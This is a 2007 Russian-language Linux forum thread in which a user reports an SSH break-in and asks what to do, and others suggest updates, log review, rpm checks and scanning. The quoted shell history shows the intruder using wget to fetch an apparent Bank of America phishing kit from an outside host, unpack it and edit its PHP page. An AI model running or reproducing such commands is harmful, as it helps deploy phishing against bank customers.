Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Linux и FreeBSD » Общий по Linux » Взломали. Что делать?

Ответить
Настройки темы
Взломали. Что делать?

Старожил


Сообщения: 179
Благодарности: 1

Профиль | Сайт | Отправить PM | Цитировать


Только что зашёл на свою машину через ssh и обнаружил, что последний сеанс был неизвестно откуда :-(
Вот последние выполненные команды (из history):
Цитата:
982 cd /usr/include/
983 cat libssh.h
984 more libssh.h
985 cd /var/www
986 ls -all
987 cd html
988 ls
989 cat index.html
990 ftp
991 wget http://www.caldsl.com/~b1yamamoto/ww...ica.com.tar.gz
992 wget http://www.caldsl.com/~b1yamamoto/ww...ica.com.tar.gz
993 ftp
994 ls
995 tar zxvf www.bankofamerica.com.tar.gz
996 rm -rf
997 ls
998 cd http://www.bankofamerica.com/sslencr...nline_banking/
999 pico done.php
1000 nano done.php
Первый вопрос: как? У меня нормальный пароль (10 случайных символов), сервисов никаких опасных вроде бы не запущено (но запущен iptables).
Правда я вчера запустил proftpd... Система конечно немного старовата -- FC5...
Второй вопрос: что делать?
С помощью этих команд, как я понял, мне залили фишинг страничку (её я уже удалил). Вопрос в том, что делать дальше?
Пароль сменил, proftpd остановил. Что ещё надо сделать?

-------
Роман Чемисов
Тел.: +79149052257
ICQ: 157070721
Skype: gangabass


Отправлено: 12:46, 06-09-2007

 

Аватара для must die

Ветеран


Сообщения: 715
Благодарности: 77

Профиль | Отправить PM | Цитировать


Gangabass,

Обновления безопасности стоят?

-------
Вопреки популярному мнению, Unix - дружелюбная ОС.
Просто так случилось, что она очень избирательна в выборе друзей.


Отправлено: 13:36, 06-09-2007 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Ветеран


Сообщения: 716
Благодарности: 55

Профиль | Отправить PM | Цитировать


Интересно, к машине еще кто-нибудь имеет доступ кроме тебя?

Отправлено: 13:37, 06-09-2007 | #3


Аватара для [mzd]

Линуксоид-стакановец


Сообщения: 2391
Благодарности: 186

Профиль | Отправить PM | Цитировать


ИМХО, обновиться до последнего стабильного релиза всех пакетов, особенно все, что касается безопасности, поковырять машину спецсредствами

-------
Живя в реальном мире, стремись к невероятному... Эрнесто Че Гевара
Everybody lies. (c) House M.D.
Базовая настройка Ubuntu. Документация для новичка.
Руководство по установке, начальной настройке и основам использования операционной системы Ubuntu


Отправлено: 14:21, 06-09-2007 | #4


Аватара для ruslandh

info man howto


Сообщения: 6958
Благодарности: 384

Профиль | Сайт | Отправить PM | Цитировать


Проверить средствами rpm нет-ли левых файлов, посмотреть логи с целью нахождения логов взлома. Чаще всего взламывают через дырявые движки. Возможно так-же прослушивание ftp трафика (если нет тунелирования, пароли передаются в открытом виде).

-------
Поспешай не торопясь


Отправлено: 00:25, 07-09-2007 | #5


Старожил


Сообщения: 179
Благодарности: 1

Профиль | Сайт | Отправить PM | Цитировать


Цитата:
Проверить средствами rpm нет-ли левых файлов, посмотреть логи с целью нахождения логов взлома. Чаще всего взламывают через дырявые движки. Возможно так-же прослушивание ftp трафика (если нет тунелирования, пароли передаются в открытом виде).
На FTP я заходил только из локальной сети, так что прослушать было очень сложно.
На счёт дырявых движков надо будет посмотреть Nessus'ом.

Цитата Envel:
Интересно, к машине еще кто-нибудь имеет доступ кроме тебя? »
Получается, что имеет ;-) Ну или имел.
На самом деле доступ был только у меня. Подключался я с трёх разных мест:
1. с работы, т. е. из внутренней сети. машина с Windows полностью пропатчена, установлен Kaspersky Internet Security со свежими базами. Т. е. версия трояна тут маловероятна.
2. из дома. машина с Windows подключена к домашней сети, патчи и антивирусные базу уже не такие свежие (всё руки никак не дойдут) -- примерно полуторомесячной давности.
3. из дома. машина с Windows, патчи для ОС двухмесячной давности, а для антивируса базы месячной давности.
Я конечно проверю все компьютеры на предмет программ-шпионов, но вряд ли что-то найду. Судя по всему взломали именно Linux-машинку.
Буду обновляться до FC7.

-------
Роман Чемисов
Тел.: +79149052257
ICQ: 157070721
Skype: gangabass


Отправлено: 10:25, 07-09-2007 | #6



Компьютерный форум OSzone.net » Linux и FreeBSD » Общий по Linux » Взломали. Что делать?

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
V. 2007 - Что делать kishert Microsoft Exchange Server 2 24-02-2009 07:44
Что делать??????????? bona Мобильные ОС, смартфоны и планшеты 3 05-07-2008 16:14
Приобретение - Что делать с tracking ID ? megasecure Лицензирование продуктов Microsoft 2 19-06-2008 07:18
AVP v.5 Говорит сообщает что объект не обработан, что делать? Alon Microsoft Windows 2000/XP 3 13-11-2005 18:50
Что делать? Guest Сетевые технологии 4 17-11-2003 03:23




 
Переход